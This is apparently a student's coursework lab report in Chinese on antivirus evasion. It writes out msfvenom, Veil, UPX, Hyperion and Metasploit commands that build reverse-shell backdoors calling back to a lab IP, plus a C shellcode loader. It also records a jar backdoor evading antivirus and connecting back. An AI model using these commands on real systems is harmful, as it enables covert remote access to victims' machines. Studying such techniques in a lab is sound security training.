目錄實驗內(nèi)容通過各種方法生成后門程序，嘗試免殺1. 正確使用MSF編輯器2. 使用msfvenom生成如jar之類的其他文件3. veil4. 加殼工具5. 使用C + shellcode編程6. 使用其他課堂未介紹方法通過組合應(yīng)用各種技術(shù)實現(xiàn)惡意代碼免殺veil+msfconsole使用jar包實現(xiàn)免殺(java+metasploit)用另一電腦實測，在殺軟開啟的情況下，可運行并回連成功，注明電腦的殺軟名稱與版本報告內(nèi)容基礎(chǔ)問題回答實踐總結(jié)與體會開啟殺軟能絕對防止電腦中惡意代碼嗎？

實驗內(nèi)容

通過各種方法生成后門程序，嘗試免殺

1. 正確使用MSF編輯器

將實驗二中生成的后門程序5120backdoor.exe放到virustotal和virscan中進行檢測

virustotal結(jié)果如下

virscan結(jié)果如下

查殺率還是挺高的,不加處理的后門程序基本都會被查殺

接下來使用msf編輯器進行自定義的后門生成

msfvenom -p windows/meterpreter/reverse_tcp -e x86/bloxor LHOST=192.168.5.250 LPORT=5120 -f exe -o home/20175120pyc/exp3/mt_rt_250.exe

-p參數(shù)表示生成的payload類型，其中包括平臺(windows)、工具(meterpreter)、連接方式(reverse_tcp)

-e參數(shù)表示編碼器類型 平臺(x86)``編碼器名(bloxor)

LHOST表示本機ip地址，LPORT表示端口號

-f參數(shù)表示生成的文件類型

-o參數(shù)表示后門文件存儲路徑

在我把mt_rt_250.exe放到主機的時候就被殺出來了，沒有實現(xiàn)免殺

放到'virscan'和'virustotal'里面測試一下

看起來效果不是很好

我又將payload換成windows/encrypted_shell_reverse_tcp進行測試

效果還是差強人意，沒有實現(xiàn)免殺

2. 使用msfvenom生成如jar之類的其他文件

生成jar包

msfvenom -p java/shell_reverse_tcp LHOST=192.168.5.250 LPORT=5120 -o home/20175120pyc/exp3/java_sh_rt_250.jar

在我把jar包復(fù)制到主機的時候，殺軟沒有發(fā)現(xiàn)

接下來繼續(xù)測試回連

linux端打開msfconsole,準(zhǔn)備監(jiān)聽

輸入

use exploit/multi/handler
set payload java/shell_reverse_tcp
set LHOST 192.168.5.250
set LPORT 5120
exploit

windows端打開cmd進入放有剛剛生成后門文件的目錄

輸入java -jar java_sh_rt_250.jar

可以看到linux端接通，但又退出

我在linux端繼續(xù)輸入java -jar java_sh_rt_250.jar進行嘗試

但顯示

連接被拒絕

我找了很半天原因，最后在殺軟安全日志里發(fā)現(xiàn)

后門文件沒有被殺出來，但是回連的行為被發(fā)現(xiàn)了

關(guān)掉殺軟，試試回連

成功獲取主機shell！ windows defender沒有檢測到回連行為

可以看出來java產(chǎn)生后門的方式比之前還是更為有效的
返回目錄

3. veil

veil工具用起來是很方便的，但是安裝比較難受

詳細安裝教程可以參考兩個教程 1 2

安裝完成之后輸入 veil ，顯示如下

使用veil-evasion 輸入use 1

輸入list可以看到可選的payload

我選擇20，use 20

可以看見我們還需要設(shè)置LHOST，其他都默認了

設(shè)置完后輸入文件名ps_mt_rhs_250生成文件

其中ps_mt_rhs_250.bat放到主機環(huán)境下，ps_mt_rhs_250.rc用于linux端監(jiān)聽

在我復(fù)制過去的時候，殺軟沒反應(yīng).......

輸入msfconsole -r /var/lib/veil/output/handlers/ps_mt_rhs_250.rc開始監(jiān)聽

在windows端雙擊ps_mt_rhs_250.bat，然后就被殺軟殺掉了（意料之中）

把ps_mt_rhs_250.bat從隔離區(qū)撈出來，測試一下

效果比之前要好了一點，但還是被火絨殺出來了

返回目錄

4. 加殼工具

加殼工具通常分為壓縮殼和加密殼兩類。
壓縮殼的特點是減小軟件體積大小，加密保護不是重點。
加密殼種類比較多，不同的殼側(cè)重點不同，一些殼單純保護程序，另一些殼提供額外的功能，如提供注冊機制、使用次數(shù)、時間限制等。

壓縮殼

壓縮工具我用的是upx，kali linux自帶

加殼文件我是用的下面的我是用的第一步里面的mt_rt_250.exe

upx home/20175120pyc/exp3/mt_rt_250.exe -o home/20175120pyc/exp3/mt_rt_250_upx.exe

把生成的后門搬到主機里，然后還是被干掉了，測試一下

似乎比剛才好一丟丟......

加密殼

加密工具我使用的是Hyperion

在這里出了些問題，我參考了學(xué)姐和很多同學(xué)的博客，都是進入Hyperion文件夾下面，直接輸入

wine hyperion.exe -v ****.exe ****_hy.exe

而我完全沒有找到這個文件夾和hyperion.exe

在我輸入這一行命令的時候會出現(xiàn)

Could not find Wine Gecko. HTML rendering will be disabled.然后就失敗了

我就想自己裝個wine gecko,之后從同學(xué)的博客中中找到了解決方法

我選擇安裝最新的Hyperion-2.2 (zip下載鏈接附上）

放到exp3文件夾下，進行解壓 unzip Hyperion-2.2

cd Hyperion-2.2

i686-w64-mingw32-gcc Src/Crypter/*.c -o hyperion.exe(按照教程上是要編譯一下的，但好像沒什么用)

vim Makefile 修改原來的編譯方式cc=gcc為cc=i686-x64-mingw32-gcc 如下圖第一行

保存退出之后就在當(dāng)前文件夾下輸入 make進行編譯

輸入ls 可以看到生成了hyperion.exe文件

然后就可以進行加密殼的加殼了！

我使用的文件還是第一個生成的后門mt_rt_250.exe,對比一下效果

把mt_rt_250.exe復(fù)制到Hyperion-2.2文件夾下，輸入

wine hyperion.exe -v mt_rt_250.exe mt_rt_250_hy.exe

然后把 mt_rt_250_hy.exe 復(fù)制到主機 .....被干掉了，測試一下

看起來加密殼效果比壓縮殼好一些......

我又用之前加了壓縮殼的mt_rt_250_upx.exe做了加密殼處理生成了mt_rt_250_upx_hy.exe

放到主機來的時候還是被防火墻干掉了......測試一下

效果和加密殼差不多

返回目錄

5. 使用C + shellcode編程

使用msfvenom將后門編譯成c

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.5.250 lport=5120 -f c

生成c數(shù)組形式的shell,寫入.c文件

#include <stdlib.h>
#include <stdio.h>
unsigned char buf[] = "";

int main(){
  int (*func)() = (int(*)())buf;
    func();
}

這里有兩種方法可以對文件進行編譯

將shellcode放到主機的codeblocks進行編譯

編譯之后......

直接被干掉

在linux下進行編譯

i686-w64-mingw32-g++ win_sh_rt_250.c -o win_sh_rt_250.exe

將win_sh_rt_250.exe搬到主機去，直接被殺軟殺掉........

在exploit-db里面找shellcode

返回目錄

6. 使用其他課堂未介紹方法

用新版msf自帶的evasion進行免殺后門生成

首先輸入msfconsole進入msf控制臺

然后查看evasion的相關(guān)信息 show evasion

我選擇windows/windows_defender_exe進行測試

use windows/windows_defender_exe

看看需要設(shè)置什么參數(shù) show options

set payload windows/meterpreter/reverse_tcp設(shè)置payload

設(shè)置ip和端口號

exploit 生成后門文件

把后門文件復(fù)制到主機......然后被殺軟殺掉了,測試一下

看起來效果不錯，看一下后門的行為分析

同樣是打開主機cmd.exe,殺軟是通過后門GetTickCount和direct-cpu-clock訪問的行為特征發(fā)現(xiàn)的

通過組合應(yīng)用各種技術(shù)實現(xiàn)惡意代碼免殺

veil+msfconsole

我想用veil+msfconsole實現(xiàn)免殺與回連

然后我一個一個的試：autoit、auxiliary、c、cs、go、powershell、Python、ruby

auxiliary模塊的參數(shù)需要輸入文件路徑，但我沒整明白......

其中Python模塊的總是出問題，我之前沒學(xué)過python，veil生成了runme.bat和setup.py文件

我裝好了python環(huán)境和python IDE工具pyCharm

經(jīng)過一番查找和詢問同學(xué)，我輸入python setup.py,然后出現(xiàn)

又是一番嘗試，我用pyCharm工具將py2exe模塊加進去了，然后輸入python setup.py py2exe，出現(xiàn)

打開kali端監(jiān)聽：msfconsole -r *********/**.rc

在主機端雙擊runme.bat，然后沒反應(yīng)......然后就不知道怎么辦了，Python模塊就放棄了

使用jar包實現(xiàn)免殺(java+metasploit)

我使用msfvenom工具進行生成，在java環(huán)境的支持下，使用：

msfvenom -p java/shell/reverse_tcp lhost=192.168.5.250 lport=5120 -o java_shrt_250.jar生成jar包

移植到主機上，經(jīng)檢測，實現(xiàn)免殺

用另一電腦實測，在殺軟開啟的情況下，可運行并回連成功，注明電腦的殺軟名稱與版本

電腦殺軟名稱為騰訊電腦管家，電腦版本為windows10

因為之前使用jar包實現(xiàn)免殺，我就嘗試回連

同樣使用msfconsole工具進行監(jiān)聽

回連成功！

返回目錄

報告內(nèi)容

基礎(chǔ)問題回答

殺軟是如何檢測出惡意代碼的？

根據(jù)惡意代碼的特征碼進行檢測

特征碼就是一段或多段數(shù)據(jù)。進行惡意軟件的檢測時，殺軟并不是比對整個文件，而只能只其中一個或幾個片斷作為識別依據(jù)。AV軟件廠商要做的就是盡量搜集最全的、最新的特征碼庫。

啟發(fā)式惡意軟件檢測

即根據(jù)些片面特征去推斷。如果一個軟件在干通常是惡意軟件干的事，看起來了像個惡意軟件，那我們就把它當(dāng)成一個惡意軟件。

基于行為的惡意軟件檢測

基于行為的檢測相當(dāng)于是啟發(fā)式的一種，或者是加入了行為監(jiān)控的啟發(fā)式

免殺是做什么？

對惡意軟件做一些處理，使其在能夠起作用的同時不被殺毒軟件殺出來

免殺的基本方法有哪些？

改變特征碼

如果你手里只有EXE：加殼：壓縮殼 加密殼
有shellcode(像Meterpreter）：用encode進行編碼、基于payload重新編譯生成可執(zhí)行文件
有源代碼：用其他語言進行重寫再編譯（veil-evasion）

改變行為

通訊方式：盡量使用反彈式連接、使用隧道技術(shù)、加密通訊數(shù)據(jù)
操作模式：基于內(nèi)存操作、減少對系統(tǒng)的修改、加入混淆作用的正常功能代碼

非常規(guī)手段

使用一個有漏洞的應(yīng)用當(dāng)成后門，編寫攻擊代碼集成到如MSF中。
使用社工類攻擊，誘騙目標(biāo)關(guān)閉AV軟件。
純手工打造一個惡意軟件

返回目錄

實踐總結(jié)與體會

    這次實驗難度較大，我花費了很多時間，從工具的安裝、嘗試的次數(shù)、安裝的平臺環(huán)境數(shù)等方面都遠遠比前兩個實驗要復(fù)雜。但實現(xiàn)免殺卻讓我的興趣有了很大的提升，因為這是用最貼近生活的方式讓我感受到了網(wǎng)絡(luò)病毒的威力。只要有一個能夠繞過殺軟的病毒，我的電腦里就必定存在后門。而后門的危害我在第二次實驗中也實實在在的體驗過了，網(wǎng)絡(luò)安全真的是現(xiàn)實中不可或缺的一環(huán)。
    在實驗操作中，我遇到了很多困難，安裝veil，我從開始安裝到最終成功幾乎用了三天時間；不斷用各種工具生成后門的過程中，很多文件不能編譯成exe格式，就必須安裝文件能夠運行的環(huán)境等等....好在問題還是一個個的迎刃而解了。但是免殺的實現(xiàn)我還有很長的路要走，這次的實驗中我想使用exploit-db中的shellcode來生成后門，但是嘗試了很多個，用msfconsole監(jiān)聽的時候都沒有反應(yīng)，我也看不出來這段shellcode應(yīng)該怎么樣具體進行操作，但我覺得如果exploit-db最新的shellcode用上了免殺應(yīng)該會簡單很多。
    這次實驗顯著的提高了我的網(wǎng)絡(luò)安全防范意識和對于網(wǎng)絡(luò)滲透的興趣，在之后的學(xué)習(xí)中，我會繼續(xù)努力。

開啟殺軟能絕對防止電腦中惡意代碼嗎？

不能。因為現(xiàn)在很多的后門能夠?qū)崿F(xiàn)免殺，繞過殺軟進行攻擊。

總結(jié)

以上是生活随笔為你收集整理的2020-2 网络对抗技术 20175120 exp3 免杀原理与实践的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。